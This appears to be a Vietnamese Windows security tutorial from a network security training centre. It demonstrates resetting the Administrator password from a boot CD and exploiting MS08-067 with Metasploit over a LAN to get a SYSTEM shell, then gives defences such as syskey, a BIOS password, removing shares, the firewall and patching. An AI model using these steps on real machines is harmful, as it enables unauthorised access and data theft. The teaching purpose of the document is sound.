Đang tải... (xem toàn văn)
pandazip com 1 Bảo mật máy tính Winddows Nội dung Phần 1 Bảo mật máy tính Windows tránh các cách truy cập trái phép trực tiếp 1 Trình diễn kỹ thuật bẻ khóa mật khẩu tài khoản người dùng để truy cập và.
pandazip.com Bảo mật máy tính Winddows Nội dung: Phần 1: Bảo mật máy tính Windows tránh cách truy cập trái phép trực tiếp Trình diễn kỹ thuật bẻ khóa mật tài khoản người dùng để truy cập vào Windows Phương pháp Phòng chống Phần 2: Bảo mật máy tính Windows tránh việc truy cập gián tiếp từ xa thơng qua mơi trường mạng Trình diễn phương pháp cơng vào máy tính từ xa thông qua mạng LAN, chiếm quyền ăn cắp liệu máy tính chạy hệ điều hành Windows Phương pháp phòng chống Đối tượng: Dành cho tất người sử dụng máy tính chạy hệ điều hành Windows Thực hiện: Phần 1: Kỹ thuật bẻ khóa mật Windows Sử dụng cơng cụ : Active Password Changer có sẵn Đĩa Hirenboot Bước 1: Đặt đĩa Hirenboot vào khay đĩa sau khởi động máy tính đĩa hình 1: thiết lập máy tính khởi động đĩa CD Lưu {: Sau thiết lập xong ta nhấn phím F10 bàn phím chọn Yes Khởi động lại máy tính-máy tính khởi động vào giao diện đĩa CD hirenboot Trương Văn Cường www.athena.edu.vn hình 2: giao diện Menu Hirenboot Chọn Dos Programs -> Password & Registry tools -> Active Password Changer hình 3: giao diện Active Password Changer Chọn mục Số 1: Chosse Logical Drive -> Enter hình 4: Danh sách phân vùng ổ cứng máy tính (Vùng chứa Windows thường mục số "0") Bấm phím "0" -> Enter Trương Văn Cường www.athena.edu.vn hình 5: Liệt kê file "SAM" chứa liệu mật Nhấn phím "Enter" để tiếp tục hình 6: danh sách tài khoản người dùng Windows Chọn tài khoản Administrator (thường số "0") sau nhấn Enter hình 7: danh sách tùy chọn Ở bước ta cần nhấn phím ''Y'' sau nhấn Enter -> mật tài khoản "Administrator" khôi phục thành mật "trắng" Khởi động lại Máy tính dùng tài khoản "Administrator/null" để truy cập vào Windows Trương Văn Cường www.athena.edu.vn Phần 2: Kỹ thuật truy cập vào Windows từ xa qua mạng LAN Sử dụng phần mềm Metasploit Chuẩn bị: Phần mềm Metasploit cài đặt Windows dùng Đĩa Backtrack Bước 1: Kiểm tra địa IP máy tính Windows XP, xem IP máy tính chạy Backtrack hình 8: IP máy chạy Backtrack 5: 172.16.30.97 hình 9: IP máy Windows XP: 172.16.30.98 Trương Văn Cường www.athena.edu.vn Bước 2: Khởi động phần mềm Metasploit Backtrack: gỏ lệnh "msfconsole" hình 10: giao diện Metasploit Gỏ lệnh "use exploit/windows/smb/ms08_067_netapi" nhấn Enter hình 11: thiết lập thông số để thực công chiếm quyền Gỏ lệnh sau: Set RHOST 172.16.30.98 # Gán thông số IP Windows XP Set LHOST 172.16.30.97 # Gán thông số IP máy chạy Metasploit exploit # Bắt đầu cơng Trương Văn Cường www.athena.edu.vn hình 12: công thành công Gỏ tiếp "shell" -> Enter để truy cập giao diện "command-line" máy Windows XP hình 13: Đã truy cập vào chế độ "command-line" Windows XP với quyền Hệ thống Khai thác lệnh như: "net user"; "net local group"; "net share" để chiếm quyền Windows XP lấy liệu từ xa qua mạng LAN Trương Văn Cường www.athena.edu.vn Phần 3: Bảo mật Giải pháp phòng chống truy cập trực tiếp vào máy tính Windows a Khóa tính khởi động vào Hirenboot BIOS máy tính hình 14: thiết lập chế độ ưu tiên khởi động vào máy tính ổ đĩa cứng hình 15: thiết lập mật truy cập vào BIOS muốn chỉnh sửa thông tin BIOS b Bổ sung mật hệ thống: Ngoài việc dùng mật cho tài khoản người dùng, ta bổ sung thêm mật cho hệ thống, khởi động vào Windows cần phải nhập mật trước nhập mật tài khoản, ta có hai lần nhập mật Windows Hiện chưa có cơng cụ bẻ mật hệ thống Trương Văn Cường www.athena.edu.vn hình 16: chạy phần mềm "syskey" Gỏ lệnh: Syskey -> Enter Phần thiết lập mật hệ thống xuất hiện, chọn Update hình 17: đặt mật khởi động Chọn mục: Password Statup, gỏ tiếp mật cần thiết lập vào hai bên dưới, sau nhấn "OK" Mật lập khởi động vào Windows xuất hộp thoại yêu cầu nhập mật Lưu {: Mật hoàn toàn khác biệt không liên quan đến mật mà ta gán tài khoản người dùng Trương Văn Cường www.athena.edu.vn hình 18: phải nhập mật hệ thống vào máy khởi động xong Kết luận: Cách thiết lập mật BIOS thay đổi quyền ưu tiên khởi động phá hủy cách gỡ bỏ nguồn nuôi (PIN-CMOS) bo mạch chủ Cho nên ta không thiết phải thiết lập cách máy tính để bàn Server Phương pháp thiết lập mật "Syskey" đơn giản cực kz hiệu quả, ta áp dụng cho loại máy tính chạy hệ điều hành Windows Giải pháp phịng chống cơng từ xa qua mạng LAN Các bước thực hiện: Tắt toàn thư mục chia sẻ (Sharing), thiết lập Firewall cho máy tính a Tắt thư mục "share" hình 19: Các thư mục "Share" Trương Văn Cường www.athena.edu.vn Gỏ lệnh "net share" để xem thư mục chia sẻ Gỏ lệnh "net share 'thư mục share' /del" để xóa thư mục share (Chỉ xóa share khơng xóa thư mục chứa liệu" b Thiết lập tường lửa "Firewall" hình 20: bật firewall máy tính Windows Gỏ lệnh sau netsh firewall set opmode mode=enable Báo "OK" có nghĩa thiết lập thành công c Cài đặt vá (hotfix) phiên Windows dùng (Windows XP) Truy cập trang web: http://www.microsoft.com/en-us/download/details.aspx?id=3205 hình 21: download vá lỗi Download vá lỗi sau tiến hành cài đặt vá, khởi động lại Windows Tiến hành công lại để kiểm tra kết bảo mật 10 Trương Văn Cường www.athena.edu.vn Kết luận: Phần mềm Metasploit có khả khai thác lỗ hổng Windows, ta thường xuyên cập nhật cho Windows tính Autoupdate, download vá lỗi khẩn cấp từ Microsoft để vá lỗi cho hệ điều hành Luôn tắt thư mục "Share" sau sử dụng, bật tính Firewall Windows để phịng tránh cơng bảo vệ máy tính Chúc bạn thành công! Trương Văn Cường - Giảng viên Trung tâm đào tạo quản trị & An ninh mạng ATHENA Mọi thắc mắc xin liên hệ Email: cuongtv@athenavn.com cuong.t.v@live.com 11